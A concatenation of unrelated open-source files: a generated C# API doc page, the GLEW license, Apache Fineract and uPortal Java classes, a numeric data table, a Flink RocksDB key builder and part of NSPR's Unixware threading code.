<a href="#SectionHeader0" onclick="javascript: SetSectionVisibility(0, true); SetExpandCollapseAllToCollapseAll();">Syntax</a>
</div>
<div class="DarkLine"></div>
<div class="LightLine"></div>
<div id="HeaderToolbar">
<img id="ExpandCollapseAllImg" src="../../GFX/SmallSquareExpanded.gif" alt="" style="vertical-align: top;" onclick="javascript: ToggleAllSectionsVisibility();" />
<span id="ExpandCollapseAllSpan" onclick="javascript: ToggleAllSectionsVisibility();">Collapse All</span>
</div>
</div>
<div id="Contents">
<a id="ContentsAnchor"> </a>
Construct an instance with the given message.
<div id="ItemLocation">
<b>Declaring type:</b> <a href="../../Contents/1/44.html">Contract.RequiresException</a><br />
<b>Namespace:</b> <a href="../../Contents/1/38.html">System.Diagnostics.Contracts</a><br />
<b>Assembly:</b> <a href="../../Contents/1/3.html">Sasa.Contracts</a>
</div>
<div id="SectionHeader0" class="SectionHeader">
<img id="SectionExpanderImg0" src="../../GFX/BigSquareExpanded.gif" alt="Collapse/Expand" onclick="javascript: ToggleSectionVisibility(0);" />
<span class="SectionHeader">
<span class="ArrowCursor" onclick="javascript: ToggleSectionVisibility(0);">
Syntax
</span>
</span>
</div>
<div id="SectionContainerDiv0" class="SectionContainer">
<table class="CodeTable"><col width="100%" /><tr class="CodeTable"><th class="CodeTable">C#</th></tr><tr class="CodeTable"><td class="CodeTable"><pre style="margin-left: 2px;">public RequiresException (
string <i>msg</i>
) </pre></td></tr></table>
<div class="CommentHeader">Parameters</div>
<div class="CommentParameterName">msg</div>
<div class="ParameterCommentContainer">
The error message.
</div>
<div class="TopLink"><a href="#ContentsAnchor">Top</a></div></div>
</div>
<div id="Footer">
<span class="Footer">Generated by <a href="http://immdocnet.codeplex.com/" target="_blank">ImmDoc .NET</a></span>.
</div>
</body>
</html>
| {
"pile_set_name": "Github"
} |
The OpenGL Extension Wrangler Library
Copyright (C) 2002-2008, Milan Ikits <milan ikits[]ieee org>
Copyright (C) 2002-2008, Marcelo E. Magallon <mmagallo[]debian org>
Copyright (C) 2002, Lev Povalahev
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* The name of the author may be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
THE POSSIBILITY OF SUCH DAMAGE.
| {
"pile_set_name": "Github"
} |
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.fineract.accounting.provisioning.api;
import javax.ws.rs.Consumes;
import javax.ws.rs.GET;
import javax.ws.rs.POST;
import javax.ws.rs.Path;
import javax.ws.rs.PathParam;
import javax.ws.rs.Produces;
import javax.ws.rs.QueryParam;
import javax.ws.rs.core.Context;
import javax.ws.rs.core.MediaType;
import javax.ws.rs.core.UriInfo;
import org.apache.fineract.accounting.provisioning.constant.ProvisioningEntriesApiConstants;
import org.apache.fineract.accounting.provisioning.data.LoanProductProvisioningEntryData;
import org.apache.fineract.accounting.provisioning.data.ProvisioningEntryData;
import org.apache.fineract.accounting.provisioning.service.ProvisioningEntriesReadPlatformService;
import org.apache.fineract.commands.domain.CommandWrapper;
import org.apache.fineract.commands.service.CommandWrapperBuilder;
import org.apache.fineract.commands.service.PortfolioCommandSourceWritePlatformService;
import org.apache.fineract.infrastructure.core.api.ApiRequestParameterHelper;
import org.apache.fineract.infrastructure.core.data.CommandProcessingResult;
import org.apache.fineract.infrastructure.core.exception.UnrecognizedQueryParamException;
import org.apache.fineract.infrastructure.core.serialization.ApiRequestJsonSerializationSettings;
import org.apache.fineract.infrastructure.core.serialization.DefaultToApiJsonSerializer;
import org.apache.fineract.infrastructure.core.service.Page;
import org.apache.fineract.infrastructure.core.service.SearchParameters;
import org.apache.fineract.infrastructure.security.service.PlatformSecurityContext;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.context.annotation.Scope;
import org.springframework.stereotype.Component;
/**
 * JAX-RS resource for loan-loss provisioning entries, mounted at
 * {@code /provisioningentries}.
 *
 * <p>Write operations are routed through the portfolio command source
 * service (command pattern); read operations go directly to the
 * read-platform service and are serialized according to the caller's
 * query parameters.
 */
@Path("/provisioningentries")
@Component
@Scope("singleton")
public class ProvisioningEntriesApiResource {

    private final PlatformSecurityContext platformSecurityContext;
    private final PortfolioCommandSourceWritePlatformService commandsSourceWritePlatformService;
    // Serializer for single ProvisioningEntryData payloads.
    private final DefaultToApiJsonSerializer<ProvisioningEntryData> toApiJsonSerializer;
    // Serializer for pages/collections (element type varies by endpoint).
    private final DefaultToApiJsonSerializer<Object> entriesApiJsonSerializer;
    private final ProvisioningEntriesReadPlatformService provisioningEntriesReadPlatformService;
    private final ApiRequestParameterHelper apiRequestParameterHelper;

    @Autowired
    public ProvisioningEntriesApiResource(final PlatformSecurityContext platformSecurityContext,
            final PortfolioCommandSourceWritePlatformService commandsSourceWritePlatformService,
            final DefaultToApiJsonSerializer<ProvisioningEntryData> toApiJsonSerializer,
            final ProvisioningEntriesReadPlatformService provisioningEntriesReadPlatformService,
            final ApiRequestParameterHelper apiRequestParameterHelper, final DefaultToApiJsonSerializer<Object> entriesApiJsonSerializer) {
        this.platformSecurityContext = platformSecurityContext;
        this.commandsSourceWritePlatformService = commandsSourceWritePlatformService;
        this.toApiJsonSerializer = toApiJsonSerializer;
        this.provisioningEntriesReadPlatformService = provisioningEntriesReadPlatformService;
        this.apiRequestParameterHelper = apiRequestParameterHelper;
        this.entriesApiJsonSerializer = entriesApiJsonSerializer;
    }

    /**
     * Creates a new provisioning entry from the supplied JSON command body.
     *
     * @param apiRequestBodyAsJson raw JSON command payload
     * @return the serialized {@link CommandProcessingResult}
     */
    @POST
    @Consumes({ MediaType.APPLICATION_JSON })
    @Produces({ MediaType.APPLICATION_JSON })
    public String createProvisioningEntries(final String apiRequestBodyAsJson) {
        CommandWrapper commandWrapper = null;
        // Authentication check only; the authenticated user is not used here.
        this.platformSecurityContext.authenticatedUser();
        commandWrapper = new CommandWrapperBuilder().createProvisioningEntries().withJson(apiRequestBodyAsJson).build();
        final CommandProcessingResult commandProcessingResult = this.commandsSourceWritePlatformService.logCommandSource(commandWrapper);
        return this.toApiJsonSerializer.serialize(commandProcessingResult);
    }

    /**
     * Applies a command to an existing provisioning entry.
     *
     * <p>Supported {@code command} values:
     * <ul>
     * <li>{@code createjournalentry} — create journal entries for the entry</li>
     * <li>{@code recreateprovisioningentry} — rebuild the entry</li>
     * </ul>
     *
     * @param entryId the provisioning entry identifier
     * @param commandParam the command selector (see above)
     * @param apiRequestBodyAsJson raw JSON command payload
     * @return the serialized {@link CommandProcessingResult}
     * @throws UnrecognizedQueryParamException for any other command value
     */
    @POST
    @Path("{entryId}")
    @Consumes({ MediaType.APPLICATION_JSON })
    @Produces({ MediaType.APPLICATION_JSON })
    public String modifyProvisioningEntry(@PathParam("entryId") final Long entryId, @QueryParam("command") final String commandParam,
            final String apiRequestBodyAsJson) {
        CommandWrapper commandWrapper = null;
        this.platformSecurityContext.authenticatedUser();
        if ("createjournalentry".equals(commandParam)) {
            commandWrapper = new CommandWrapperBuilder().createProvisioningJournalEntries(entryId).withJson(apiRequestBodyAsJson).build();
            final CommandProcessingResult commandProcessingResult = this.commandsSourceWritePlatformService
                    .logCommandSource(commandWrapper);
            return this.toApiJsonSerializer.serialize(commandProcessingResult);
        } else if ("recreateprovisioningentry".equals(commandParam)) {
            commandWrapper = new CommandWrapperBuilder().reCreateProvisioningEntries(entryId).withJson(apiRequestBodyAsJson).build();
            final CommandProcessingResult commandProcessingResult = this.commandsSourceWritePlatformService
                    .logCommandSource(commandWrapper);
            return this.toApiJsonSerializer.serialize(commandProcessingResult);
        }
        throw new UnrecognizedQueryParamException("command", commandParam);
    }

    /**
     * Retrieves a single provisioning entry by its identifier.
     *
     * @param entryId the provisioning entry identifier
     * @param uriInfo request URI context used to derive serialization settings
     * @return the serialized {@link ProvisioningEntryData}
     */
    @GET
    @Path("{entryId}")
    @Consumes({ MediaType.APPLICATION_JSON })
    @Produces({ MediaType.APPLICATION_JSON })
    public String retrieveProvisioningEntry(@PathParam("entryId") final Long entryId, @Context final UriInfo uriInfo) {
        platformSecurityContext.authenticatedUser();
        ProvisioningEntryData data = this.provisioningEntriesReadPlatformService.retrieveProvisioningEntryData(entryId);
        final ApiRequestJsonSerializationSettings settings = this.apiRequestParameterHelper.process(uriInfo.getQueryParameters());
        return this.toApiJsonSerializer.serialize(settings, data, ProvisioningEntriesApiConstants.PROVISIONING_ENTRY_PARAMETERS);
    }

    /**
     * Retrieves a page of per-loan-product provisioning entries filtered by
     * the optional entry/office/product/category identifiers.
     *
     * <p>NOTE(review): the method name misspells "Provisioning"
     * ("retrieveProviioningEntries"). Renaming it would not affect REST
     * clients (the route is the {@code @Path} value), but it is left
     * unchanged here to avoid any reflective/framework surprises.
     */
    @GET
    @Path("entries")
    @Consumes({ MediaType.APPLICATION_JSON })
    @Produces({ MediaType.APPLICATION_JSON })
    public String retrieveProviioningEntries(@QueryParam("entryId") final Long entryId, @QueryParam("offset") final Integer offset,
            @QueryParam("limit") final Integer limit, @QueryParam("officeId") final Long officeId,
            @QueryParam("productId") final Long productId, @QueryParam("categoryId") final Long categoryId, @Context final UriInfo uriInfo) {
        this.platformSecurityContext.authenticatedUser();
        SearchParameters params = SearchParameters.forProvisioningEntries(entryId, officeId, productId, categoryId, offset, limit);
        Page<LoanProductProvisioningEntryData> entries = this.provisioningEntriesReadPlatformService.retrieveProvisioningEntries(params);
        final ApiRequestJsonSerializationSettings settings = this.apiRequestParameterHelper.process(uriInfo.getQueryParameters());
        return this.entriesApiJsonSerializer.serialize(settings, entries, ProvisioningEntriesApiConstants.PROVISIONING_ENTRY_PARAMETERS);
    }

    /**
     * Retrieves a page of all provisioning entries.
     *
     * @param offset pagination offset (may be null)
     * @param limit pagination limit (may be null)
     * @param uriInfo request URI context used to derive serialization settings
     * @return the serialized page of {@link ProvisioningEntryData}
     */
    @GET
    @Consumes({ MediaType.APPLICATION_JSON })
    @Produces({ MediaType.APPLICATION_JSON })
    public String retrieveAllProvisioningEntries(@QueryParam("offset") final Integer offset, @QueryParam("limit") final Integer limit,
            @Context final UriInfo uriInfo) {
        platformSecurityContext.authenticatedUser();
        Page<ProvisioningEntryData> data = this.provisioningEntriesReadPlatformService.retrieveAllProvisioningEntries(offset, limit);
        final ApiRequestJsonSerializationSettings settings = this.apiRequestParameterHelper.process(uriInfo.getQueryParameters());
        return this.entriesApiJsonSerializer.serialize(settings, data, ProvisioningEntriesApiConstants.ALL_PROVISIONING_ENTRIES);
    }
}
| {
"pile_set_name": "Github"
} |
/**
* Licensed to Apereo under one or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information regarding copyright ownership. Apereo
* licenses this file to you under the Apache License, Version 2.0 (the "License"); you may not use
* this file except in compliance with the License. You may obtain a copy of the License at the
* following location:
*
* <p>http://www.apache.org/licenses/LICENSE-2.0
*
* <p>Unless required by applicable law or agreed to in writing, software distributed under the
* License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
* express or implied. See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apereo.portal.events.aggr;
/**
* Context of the current event aggregation run. There is a single instance of this object for each
* aggregation run. It can be used by aggregators to store data across sessions <br>
* NOTE: Attributes are globally scoped, aggregates must make sure the key is appropriate to prevent
* stepping on toes.
*/
public interface EventAggregationContext {

    /**
     * Store an attribute in the current aggregation context.
     *
     * @param key the attribute key; keys are globally scoped per the
     *            class-level note, so use one unique to your aggregator
     * @param value the value to associate with {@code key}
     */
    void setAttribute(Object key, Object value);

    /**
     * Get a value from the current aggregation context.
     *
     * @param key the key the value was stored under
     * @return the stored value cast (unchecked) to the caller's expected
     *         type; presumably {@code null} when nothing was stored under
     *         {@code key} — verify against the implementation
     */
    <T> T getAttribute(Object key);
}
| {
"pile_set_name": "Github"
} |
0 0 0 1 -0.328945 -0.175844
0 0 6.5 1 -0.363158 0.107856
10 0 0 1 0.0698896 -0.11075
10 0 6.5 1 0.0485066 0.138123
10 10 0 1 0.308107 -0.201914
10 10 6.5 1 0.282333 0.18789
0 10 0 1 -0.310373 -0.334345
0 10 6.5 1 -0.368596 0.148252
0 5 10 1 -0.38948 0.324362
10 5 10 1 0.125874 0.327632
0 6 0 1 -0.320227 -0.25025
0 8 0 1 -0.315902 -0.287164
0 8 5 1 -0.354846 0.0356805
0 6 5 1 -0.354936 0.0375116
0 2 2.5 1 -0.340669 -0.0792083
0 4 2.5 1 -0.339183 -0.0922361
0 4 5 1 -0.355008 0.0389753
0 2 5 1 -0.355067 0.0401721
0.5 0.5 -0.5 1 -0.302735 -0.198363
0.5 0.5 6 1 -0.336713 0.0881757
10.5 0.5 -0.5 1 0.0968582 -0.129763
10.5 0.5 6 1 0.0758307 0.121295
10.5 10.5 -0.5 1 0.354226 -0.233199
10.5 10.5 6 1 0.329596 0.16199
0.5 10.5 -0.5 1 -0.265205 -0.375999
0.5 10.5 6 1 -0.322705 0.114856
0.5 5.5 9.5 1 -0.355727 0.302286
10.5 5.5 9.5 1 0.160893 0.309142
0.5 6.5 -0.5 1 -0.285193 -0.281391
0.5 8.5 -0.5 1 -0.276441 -0.322819
0.5 8.5 4.5 1 -0.314963 0.00481314
0.5 6.5 4.5 1 -0.319572 0.0101702
0.5 2.5 2 1 -0.311948 -0.102773
0.5 4.5 2 1 -0.30755 -0.118356
0.5 4.5 4.5 1 -0.323244 0.0144371
0.5 2.5 4.5 1 -0.326237 0.0179158
| {
"pile_set_name": "Github"
} |
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.flink.contrib.streaming.state;
import org.apache.flink.annotation.Internal;
import org.apache.flink.annotation.VisibleForTesting;
import org.apache.flink.api.common.typeutils.TypeSerializer;
import org.apache.flink.core.memory.DataOutputSerializer;
import org.apache.flink.util.FlinkRuntimeException;
import javax.annotation.Nonnegative;
import javax.annotation.Nonnull;
import javax.annotation.concurrent.NotThreadSafe;
import java.io.IOException;
/**
 * Responsible for serialization of the current key, current key-group and namespace into a
 * composite RocksDB key. Will reuse the previously serialized key bytes if possible.
 *
 * @param <K> type of the key.
 */
@NotThreadSafe
@Internal
class RocksDBSerializedCompositeKeyBuilder<K> {

    /** The serializer for the key. */
    @Nonnull
    private final TypeSerializer<K> keySerializer;

    /** The output buffer that the composite key is written into. */
    @Nonnull
    private final DataOutputSerializer keyOutView;

    /** The number of key-group-prefix bytes written before the key. */
    @Nonnegative
    private final int keyGroupPrefixBytes;

    /** This flag indicates whether the key type has a variable byte size in serialization. */
    private final boolean keySerializerTypeVariableSized;

    /** Buffer position right after the serialized key; 0 means no key has been written yet. */
    @Nonnegative
    private int afterKeyMark;

    public RocksDBSerializedCompositeKeyBuilder(
        @Nonnull TypeSerializer<K> keySerializer,
        @Nonnegative int keyGroupPrefixBytes,
        @Nonnegative int initialSize) {
        this(
            keySerializer,
            new DataOutputSerializer(initialSize),
            keyGroupPrefixBytes,
            RocksDBKeySerializationUtils.isSerializerTypeVariableSized(keySerializer),
            0);
    }

    @VisibleForTesting
    RocksDBSerializedCompositeKeyBuilder(
        @Nonnull TypeSerializer<K> keySerializer,
        @Nonnull DataOutputSerializer keyOutView,
        @Nonnegative int keyGroupPrefixBytes,
        boolean keySerializerTypeVariableSized,
        @Nonnegative int afterKeyMark) {
        this.keySerializer = keySerializer;
        this.keyOutView = keyOutView;
        this.keyGroupPrefixBytes = keyGroupPrefixBytes;
        this.keySerializerTypeVariableSized = keySerializerTypeVariableSized;
        this.afterKeyMark = afterKeyMark;
    }

    /**
     * Sets the key and key-group as prefix. This will serialize them into the buffer and they will
     * be used to create composite keys with provided namespaces.
     *
     * @param key the key.
     * @param keyGroupId the key-group id for the key.
     */
    public void setKeyAndKeyGroup(@Nonnull K key, @Nonnegative int keyGroupId) {
        try {
            serializeKeyGroupAndKey(key, keyGroupId);
        } catch (IOException shouldNeverHappen) {
            // The output view writes to an in-memory buffer, so IO failures are unexpected.
            throw new FlinkRuntimeException(shouldNeverHappen);
        }
    }

    /**
     * Returns a serialized composite key, from the key and key-group provided in a previous call to
     * {@link #setKeyAndKeyGroup(Object, int)} and the given namespace.
     *
     * @param namespace the namespace to concatenate for the serialized composite key bytes.
     * @param namespaceSerializer the serializer to obtain the serialized form of the namespace.
     * @param <N> the type of the namespace.
     * @return the bytes for the serialized composite key of key-group, key, namespace.
     */
    @Nonnull
    public <N> byte[] buildCompositeKeyNamespace(@Nonnull N namespace, @Nonnull TypeSerializer<N> namespaceSerializer) {
        try {
            serializeNamespace(namespace, namespaceSerializer);
            final byte[] result = keyOutView.getCopyOfBuffer();
            // Truncate back to the key so the buffer can be reused with another namespace.
            resetToKey();
            return result;
        } catch (IOException shouldNeverHappen) {
            throw new FlinkRuntimeException(shouldNeverHappen);
        }
    }

    /**
     * Returns a serialized composite key, from the key and key-group provided in a previous call to
     * {@link #setKeyAndKeyGroup(Object, int)} and the given namespace, followed by the given
     * user-key.
     *
     * @param namespace the namespace to concatenate for the serialized composite key bytes.
     * @param namespaceSerializer the serializer to obtain the serialized form of the namespace.
     * @param userKey the user-key to concatenate for the serialized composite key, after the namespace.
     * @param userKeySerializer the serializer to obtain the serialized form of the user-key.
     * @param <N> the type of the namespace.
     * @param <UK> the type of the user-key.
     * @return the bytes for the serialized composite key of key-group, key, namespace, user-key.
     */
    @Nonnull
    public <N, UK> byte[] buildCompositeKeyNamesSpaceUserKey(
        @Nonnull N namespace,
        @Nonnull TypeSerializer<N> namespaceSerializer,
        @Nonnull UK userKey,
        @Nonnull TypeSerializer<UK> userKeySerializer) throws IOException {
        serializeNamespace(namespace, namespaceSerializer);
        userKeySerializer.serialize(userKey, keyOutView);
        byte[] result = keyOutView.getCopyOfBuffer();
        resetToKey();
        return result;
    }

    /** Clears the buffer, then writes the key-group prefix and the key, recording the end mark. */
    private void serializeKeyGroupAndKey(K key, int keyGroupId) throws IOException {
        // clear buffer and mark
        resetFully();

        // write key-group
        RocksDBKeySerializationUtils.writeKeyGroup(
            keyGroupId,
            keyGroupPrefixBytes,
            keyOutView);
        // write key
        keySerializer.serialize(key, keyOutView);
        afterKeyMark = keyOutView.length();
    }

    /** Appends the namespace (with a length header when key/namespace sizes are both variable). */
    private <N> void serializeNamespace(
        @Nonnull N namespace,
        @Nonnull TypeSerializer<N> namespaceSerializer) throws IOException {

        // this should only be called when there is already a key written so that we build the composite.
        assert isKeyWritten();

        final boolean ambiguousCompositeKeyPossible = isAmbiguousCompositeKeyPossible(namespaceSerializer);
        if (ambiguousCompositeKeyPossible) {
            // Prefix with the serialized key length so key/namespace boundaries stay unambiguous.
            RocksDBKeySerializationUtils.writeVariableIntBytes(
                afterKeyMark - keyGroupPrefixBytes,
                keyOutView);
        }
        RocksDBKeySerializationUtils.writeNameSpace(
            namespace,
            namespaceSerializer,
            keyOutView,
            ambiguousCompositeKeyPossible);
    }

    /** Discards everything in the buffer, including the key. */
    private void resetFully() {
        afterKeyMark = 0;
        keyOutView.clear();
    }

    /** Truncates the buffer back to the end of the serialized key. */
    private void resetToKey() {
        keyOutView.setPosition(afterKeyMark);
    }

    /** Returns true iff {@link #setKeyAndKeyGroup(Object, int)} has been called. */
    private boolean isKeyWritten() {
        return afterKeyMark > 0;
    }

    @VisibleForTesting
    boolean isAmbiguousCompositeKeyPossible(TypeSerializer<?> namespaceSerializer) {
        // Fix: use short-circuit && instead of the original non-short-circuit bitwise & on
        // booleans; the second operand is a side-effect-free check and need not be evaluated
        // when the key serializer is fixed-size.
        return keySerializerTypeVariableSized &&
            RocksDBKeySerializationUtils.isSerializerTypeVariableSized(namespaceSerializer);
    }
}
| {
"pile_set_name": "Github"
} |
/* -*- Mode: C++; tab-width: 4; indent-tabs-mode: nil; c-basic-offset: 2 -*- */
/* ***** BEGIN LICENSE BLOCK *****
* Version: MPL 1.1/GPL 2.0/LGPL 2.1
*
* The contents of this file are subject to the Mozilla Public License Version
* 1.1 (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
* http://www.mozilla.org/MPL/
*
* Software distributed under the License is distributed on an "AS IS" basis,
* WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
* for the specific language governing rights and limitations under the
* License.
*
* The Original Code is the Netscape Portable Runtime (NSPR).
*
* The Initial Developer of the Original Code is
* Netscape Communications Corporation.
* Portions created by the Initial Developer are Copyright (C) 1998-2000
* the Initial Developer. All Rights Reserved.
*
* Contributor(s):
*
* Alternatively, the contents of this file may be used under the terms of
* either the GNU General Public License Version 2 or later (the "GPL"), or
* the GNU Lesser General Public License Version 2.1 or later (the "LGPL"),
* in which case the provisions of the GPL or the LGPL are applicable instead
* of those above. If you wish to allow use of your version of this file only
* under the terms of either the GPL or the LGPL, and not to allow others to
* use your version of this file under the terms of the MPL, indicate your
* decision by deleting the provisions above and replace them with the notice
* and other provisions required by the GPL or the LGPL. If you do not delete
* the provisions above, a recipient may use your version of this file under
* the terms of any one of the MPL, the GPL or the LGPL.
*
* ***** END LICENSE BLOCK ***** */
#include "primpl.h"
#if !defined (USE_SVR4_THREADS)
/*
* using only NSPR threads here
*/
#include <setjmp.h>
/* No machine-dependent early initialization is needed when using only
 * NSPR user-level threads on this platform. */
void _MD_EarlyInit(void)
{
}
/* Capture the register context of thread |t| for the garbage collector.
 * For the current thread the context is refreshed via setjmp() first.
 * Stores the number of PRWords in |*np| and returns a pointer to the
 * saved context. */
PRWord *_MD_HomeGCRegisters(PRThread *t, int isCurrent, int *np)
{
if (isCurrent) {
(void) setjmp(CONTEXT(t));
}
*np = sizeof(CONTEXT(t)) / sizeof(PRWord);
return (PRWord *) CONTEXT(t);
}
#ifdef ALARMS_BREAK_TCP /* I don't think they do */

/*
 * Connect with clock interrupts blocked so an alarm cannot interrupt the
 * in-progress TCP connect.  |timeout| is unused.  Returns the result of
 * _connect().
 */
PRInt32 _MD_connect(PRInt32 osfd, const PRNetAddr *addr, PRInt32 addrlen,
                    PRIntervalTime timeout)
{
    PRInt32 rv;

    _MD_BLOCK_CLOCK_INTERRUPTS();
    rv = _connect(osfd,addr,addrlen);
    _MD_UNBLOCK_CLOCK_INTERRUPTS();
    /* Bug fix: the result was computed but never returned, so callers saw
     * an indeterminate value (compare _MD_accept below). */
    return(rv);
}

/*
 * Accept with clock interrupts blocked; see _MD_connect() above.
 * |timeout| is unused.  Returns the result of _accept().
 */
PRInt32 _MD_accept(PRInt32 osfd, PRNetAddr *addr, PRInt32 addrlen,
                   PRIntervalTime timeout)
{
    PRInt32 rv;

    _MD_BLOCK_CLOCK_INTERRUPTS();
    rv = _accept(osfd,addr,addrlen);
    _MD_UNBLOCK_CLOCK_INTERRUPTS();
    return(rv);
}
#endif
/*
* These are also implemented in pratom.c using NSPR locks. Any reason
* this might be better or worse? If you like this better, define
* _PR_HAVE_ATOMIC_OPS in include/md/unixware.h
*/
#ifdef _PR_HAVE_ATOMIC_OPS
/* Atomic operations */
#include <stdio.h>
/* Temporary file whose stdio lock (flockfile/unflockfile) is used as a
 * process-wide mutex to make the operations below atomic. */
static FILE *_uw_semf;
/* Create the temporary file that serves as the lock object; asserts on
 * failure. */
void
_MD_INIT_ATOMIC(void)
{
/* Sigh. Sure wish SYSV semaphores weren't such a pain to use */
if ((_uw_semf = tmpfile()) == NULL)
PR_ASSERT(0);
return;
}
/* Atomically increment *val under the stdio lock. */
void
_MD_ATOMIC_INCREMENT(PRInt32 *val)
{
flockfile(_uw_semf);
(*val)++;
unflockfile(_uw_semf);
}
/* Atomically add val to *ptr under the stdio lock. */
void
_MD_ATOMIC_ADD(PRInt32 *ptr, PRInt32 val)
{
flockfile(_uw_semf);
(*ptr) += val;
unflockfile(_uw_semf);
}
/* Atomically decrement *val under the stdio lock. */
void
_MD_ATOMIC_DECREMENT(PRInt32 *val)
{
flockfile(_uw_semf);
(*val)--;
unflockfile(_uw_semf);
}
/* Atomically store newval into *val under the stdio lock. */
void
_MD_ATOMIC_SET(PRInt32 *val, PRInt32 newval)
{
flockfile(_uw_semf);
*val = newval;
unflockfile(_uw_semf);
}
#endif
/* Per-thread priorities are not supported for user-level threads; no-op. */
void
_MD_SET_PRIORITY(_MDThread *thread, PRUintn newPri)
{
return;
}
/* No extra machine-dependent per-thread initialization is needed. */
PRStatus
_MD_InitializeThread(PRThread *thread)
{
return PR_SUCCESS;
}
/* Block a local (user-level) thread by switching context away from it.
 * |ticks| is unused here; timed wakeup is arranged by the caller. */
PRStatus
_MD_WAIT(PRThread *thread, PRIntervalTime ticks)
{
PR_ASSERT(!(thread->flags & _PR_GLOBAL_SCOPE));
_PR_MD_SWITCH_CONTEXT(thread);
return PR_SUCCESS;
}
/* Wake a waiter.  For user-level threads the scheduler does the actual
 * wakeup; this only sanity-checks that the thread is not global-scope. */
PRStatus
_MD_WAKEUP_WAITER(PRThread *thread)
{
if (thread) {
PR_ASSERT(!(thread->flags & _PR_GLOBAL_SCOPE));
}
return PR_SUCCESS;
}
/* These functions should not be called for Unixware */

/* Yielding is handled elsewhere in this configuration; reaching this is a bug. */
void
_MD_YIELD(void)
{
    PR_NOT_REACHED("_MD_YIELD should not be called for Unixware.");
}

/* Native thread creation is not supported in this configuration; reaching
 * this is a bug. */
PRStatus
_MD_CREATE_THREAD(
    PRThread *thread,
    void (*start) (void *),
    PRThreadPriority priority,
    PRThreadScope scope,
    PRThreadState state,
    PRUint32 stackSize)
{
    PR_NOT_REACHED("_MD_CREATE_THREAD should not be called for Unixware.");
    /* Bug fix: PR_NOT_REACHED may be compiled out in release builds, and
     * falling off the end of a non-void function is undefined behavior. */
    return PR_FAILURE;
}
#else /* USE_SVR4_THREADS */
/* NOTE:
* SPARC v9 (Ultras) do have an atomic test-and-set operation. But
* SPARC v8 doesn't. We should detect in the init if we are running on
* v8 or v9, and then use assembly where we can.
*/
#include <thread.h>
#include <synch.h>
/* Single global mutex used to emulate atomic read-modify-write operations. */
static mutex_t _unixware_atomic = DEFAULTMUTEX;

/*
 * Fix: the original macros expanded to multiple statements without a
 * do { } while (0) wrapper, which breaks when used in an unbraced
 * if/else body.  Wrapping them makes each macro a single statement;
 * all existing call sites (`TEST_THEN_ADD(val, 1);`) are unaffected.
 */
#define TEST_THEN_ADD(where, inc) \
    do { \
        if (mutex_lock(&_unixware_atomic) != 0)\
            PR_ASSERT(0);\
        *where += inc;\
        if (mutex_unlock(&_unixware_atomic) != 0)\
            PR_ASSERT(0);\
    } while (0)

#define TEST_THEN_SET(where, val) \
    do { \
        if (mutex_lock(&_unixware_atomic) != 0)\
            PR_ASSERT(0);\
        *where = val;\
        if (mutex_unlock(&_unixware_atomic) != 0)\
            PR_ASSERT(0);\
    } while (0)
/* Nothing to initialize: the global mutex is statically initialized. */
void
_MD_INIT_ATOMIC(void)
{
}
/* Atomically increment *val. */
void
_MD_ATOMIC_INCREMENT(PRInt32 *val)
{
TEST_THEN_ADD(val, 1);
}
/* Atomically add val to *ptr. */
void
_MD_ATOMIC_ADD(PRInt32 *ptr, PRInt32 val)
{
TEST_THEN_ADD(ptr, val);
}
/* Atomically decrement *val: adding 0xffffffff is adding -1 in 32-bit
 * two's-complement arithmetic. */
void
_MD_ATOMIC_DECREMENT(PRInt32 *val)
{
TEST_THEN_ADD(val, 0xffffffff);
}
/* Atomically store newval into *val. */
void
_MD_ATOMIC_SET(PRInt32 *val, PRInt32 newval)
{
TEST_THEN_SET(val, newval);
}
#include <signal.h>
#include <errno.h>
#include <fcntl.h>
#include <sys/lwp.h>
#include <sys/procfs.h>
#include <sys/syscall.h>
/* TLS keys for the current PRThread, current CPU and last-run thread. */
THREAD_KEY_T threadid_key;
